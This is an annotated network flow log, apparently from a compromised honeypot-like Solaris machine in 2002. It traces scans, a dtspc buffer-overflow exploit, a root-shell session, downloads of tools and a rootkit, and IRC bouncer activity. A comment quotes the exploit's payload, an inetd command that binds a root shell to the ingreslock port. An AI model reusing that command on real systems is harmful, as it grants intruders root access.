# XXX add UDP: syslogs # XXX add pings # scans 29 Nov 02 14:12:30 29 Nov 02 14:12:31 6 24.167.44.129.3018 -> 192.168.100.28.1433 3 3 186 162 RST 29 Nov 02 14:21:36 29 Nov 02 14:21:36 6 203.69.233.93.2341 -> 192.168.100.28.443 1 1 74 54 RST 29 Nov 02 14:25:08 29 Nov 02 14:25:10 6 61.144.145.243.3667 -> 192.168.100.28.8080 3 3 198 162 RST 29 Nov 02 14:25:08 29 Nov 02 14:25:10 6 61.144.145.243.3668 -> 192.168.100.28.80 3 3 198 162 RST 29 Nov 02 14:25:08 29 Nov 02 14:25:10 6 61.144.145.243.3677 -> 192.168.100.28.3128 3 3 198 162 RST 29 Nov 02 14:57:31 29 Nov 02 14:57:32 6 203.239.31.60.1191 -> 192.168.100.28.1433 3 3 186 162 RST 29 Nov 02 17:10:05 29 Nov 02 17:10:06 6 67.36.28.116.3916 -> 192.168.100.28.1433 3 3 186 162 RST # checking rootshell port 29 Nov 02 17:36:25 29 Nov 02 17:36:25 6 61.219.90.180.56709 -> 192.168.100.28.1524 1 1 74 54 RST # EXPLOIT # scan of dtspc, information revealed: zoberius: SunOS:5.8:sun4u. 29 Nov 02 17:36:25 29 Nov 02 17:36:26 6 61.219.90.180.56710 -> 192.168.100.28.6112 7 5 523 412 FIN # open connection to dtspc, no data transferred, purpose unknown 29 Nov 02 17:36:25 29 Nov 02 17:46:25 6 61.219.90.180.56399 -> 192.168.100.28.6112 3 2 206 144 FIN # the buffer overflow exploit itself, #echo "ingreslock stream tcp nowait root /bin/sh sh -i">/tmp/x;/usr/sbin/inetd -s /tmp/x;sleep 10;/bin/rm -f /tmp/x 29 Nov 02 17:36:26 29 Nov 02 17:36:37 6 61.219.90.180.56711 -> 192.168.100.28.6112 7 6 4648 408 FIN # connection to the rootshell 29 Nov 02 17:36:37 29 Nov 02 18:00:00 6 61.219.90.180.56712 -> 192.168.100.28.1524 1860 1838 123391 138203 RST # FTP control connection to get some tools 29 Nov 02 17:42:42 29 Nov 02 17:45:13 6 192.168.100.28.32783 -> 62.211.66.16.21 31 35 2088 2617 RST # FTP data connection: wget 29 Nov 02 17:42:51 29 Nov 02 17:43:23 6 62.211.66.16.20 -> 192.168.100.28.32784 98 65 144009 4298 FIN # FTP data connection: dlp 29 Nov 02 17:43:23 29 Nov 02 17:43:24 6 62.211.66.16.20 -> 192.168.100.28.32785 5 4 1968 272 FIN # FTP data 
connection: solbnc 29 Nov 02 17:43:24 29 Nov 02 17:43:50 6 62.211.66.16.20 -> 192.168.100.28.32786 79 51 114943 3374 FIN # FTP data connection: ipv6sun 29 Nov 02 17:44:35 29 Nov 02 17:44:35 6 62.211.66.16.20 -> 192.168.100.28.32788 5 4 831 272 FIN # wget to get rootkit over HTTP GET /bobzz/sol.tar.gz 29 Nov 02 17:45:29 29 Nov 02 17:52:40 6 192.168.100.28.32789 -> 62.211.66.53.80 821 1294 44529 1954330 FIN # ftp control to sunsolve 29 Nov 02 17:53:56 29 Nov 02 17:54:17 6 192.168.100.28.32791 -> 192.18.99.122.21 17 16 1086 1982 RST # FTP data connection: 111085-02.zip 29 Nov 02 17:54:02 29 Nov 02 17:54:17 6 192.18.99.122.20 -> 192.168.100.28.32792 26 21 32328 1298 FIN # ftp control to sunsolve 2 29 Nov 02 17:54:25 29 Nov 02 17:58:32 6 192.168.100.28.32793 -> 192.18.99.122.21 17 16 1075 1975 RST # ftp data: 108949-07.zip 29 Nov 02 17:54:31 29 Nov 02 17:58:32 6 192.18.99.122.20 -> 192.168.100.28.32794 764 666 1082792 37992 FIN # close of the idle dtspc connection (src port 56399) opened above 29 Nov 02 17:59:59 29 Nov 02 17:59:59 6 61.219.90.180.56399 ?> 192.168.100.28.6112 1 1 66 54 RST # scan of telnet 29 Nov 02 18:00:15 29 Nov 02 18:00:15 6 61.221.179.26.4342 -> 192.168.100.28.23 1 1 74 54 RST # psyBNC connect (IRC proxy) 29 Nov 02 18:04:07 29 Nov 02 18:12:40 6 80.117.14.44.3934 -> 192.168.100.28.7000 75 64 4432 19740 RST # busy IRC server 29 Nov 02 18:04:21 29 Nov 02 18:05:08 6 192.168.100.28.32795 -> 206.252.192.195.6667 8 6 501 420 FIN # ident auth attempt from IRC server 29 Nov 02 18:04:46 29 Nov 02 18:04:46 6 206.252.192.195.7254 -> 192.168.100.28.113 1 1 82 54 RST # busy IRC server 29 Nov 02 18:05:14 29 Nov 02 18:05:59 6 192.168.100.28.32796 -> 206.252.192.195.6667 7 6 439 420 FIN # ident auth attempt 29 Nov 02 18:05:38 29 Nov 02 18:05:38 6 206.252.192.195.7918 -> 192.168.100.28.113 1 1 82 54 RST # IRC busy 29 Nov 02 18:06:08 29 Nov 02 18:06:53 6 192.168.100.28.32797 -> 206.252.192.195.6667 8 6 517 420 FIN 29 Nov 02 18:06:32 29 Nov 02 18:06:32 6 206.252.192.195.8597 -> 192.168.100.28.113 1 1 82 54 RST 29 
Nov 02 18:07:02 29 Nov 02 18:07:47 6 192.168.100.28.32798 -> 206.252.192.195.6667 7 6 433 420 FIN 29 Nov 02 18:07:26 29 Nov 02 18:07:26 6 206.252.192.195.9333 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:07:59 29 Nov 02 18:08:43 6 192.168.100.28.32799 -> 206.252.192.195.6667 8 6 495 420 FIN 29 Nov 02 18:08:22 29 Nov 02 18:08:22 6 206.252.192.195.10072 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:08:52 29 Nov 02 18:09:35 6 192.168.100.28.32800 -> 206.252.192.195.6667 7 6 433 420 FIN 29 Nov 02 18:09:14 29 Nov 02 18:09:14 6 206.252.192.195.10754 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:09:47 29 Nov 02 18:10:10 6 192.168.100.28.32801 -> 206.252.192.195.5555 7 6 433 420 FIN 29 Nov 02 18:09:49 29 Nov 02 18:09:49 6 206.252.192.195.11208 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:10:25 29 Nov 02 18:10:47 6 192.168.100.28.32802 -> 206.252.192.195.5555 9 7 572 474 FIN 29 Nov 02 18:10:26 29 Nov 02 18:10:26 6 206.252.192.195.11682 -> 192.168.100.28.113 1 1 82 54 RST 29 Nov 02 18:11:02 29 Nov 02 18:11:02 6 206.252.192.195.12160 -> 192.168.100.28.113 1 1 82 54 RST # IRC irc-1.stealth.net 29 Nov 02 18:11:02 30 Nov 02 04:17:17 6 192.168.100.28.32803 -> 206.252.192.195.5555 1871 2110 123872 243212 RST # reconnect to psyBNC 29 Nov 02 18:12:39 29 Nov 02 19:01:17 6 80.117.14.44.3935 -> 192.168.100.28.7000 273 275 18066 33173 RST 29 Nov 02 19:43:15 29 Nov 02 19:43:18 6 67.195.152.135.1146 -> 192.168.100.28.139 3 3 186 162 RST 29 Nov 02 22:50:12 29 Nov 02 22:50:12 6 66.28.103.87.1742 -> 192.168.100.28.443 1 1 74 54 RST 29 Nov 02 22:54:21 29 Nov 02 22:54:23 6 80.117.14.44.1045 -> 192.168.100.28.7000 7 5 462 399 FIN 29 Nov 02 22:54:26 29 Nov 02 22:54:28 6 80.117.14.44.1046 -> 192.168.100.28.7000 6 6 408 453 FIN 29 Nov 02 22:54:31 29 Nov 02 22:54:35 6 80.117.14.44.1047 -> 192.168.100.28.7000 13 11 834 6113 RST 29 Nov 02 23:07:55 29 Nov 02 23:07:56 6 64.160.228.206.2407 -> 192.168.100.28.1433 3 3 186 162 RST 30 Nov 02 00:12:04 30 Nov 02 00:12:05 6 211.214.125.74.2262 
-> 192.168.100.28.1433 3 3 186 162 RST 30 Nov 02 04:17:02 30 Nov 02 04:17:18 6 80.117.14.44.2398 -> 192.168.100.28.7000 44 42 3432 11688 RST 30 Nov 02 06:08:00 30 Nov 02 06:08:00 6 211.75.30.52.1159 -> 192.168.100.28.443 1 1 74 54 RST 30 Nov 02 06:22:10 30 Nov 02 06:22:12 6 64.231.37.135.3731 -> 192.168.100.28.1433 3 3 186 162 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.1080 1 1 54 54 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.3128 1 1 54 54 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.80 1 1 54 54 RST 30 Nov 02 08:13:26 30 Nov 02 08:13:26 6 64.24.196.50.0 -> 192.168.100.28.8080 1 1 54 54 RST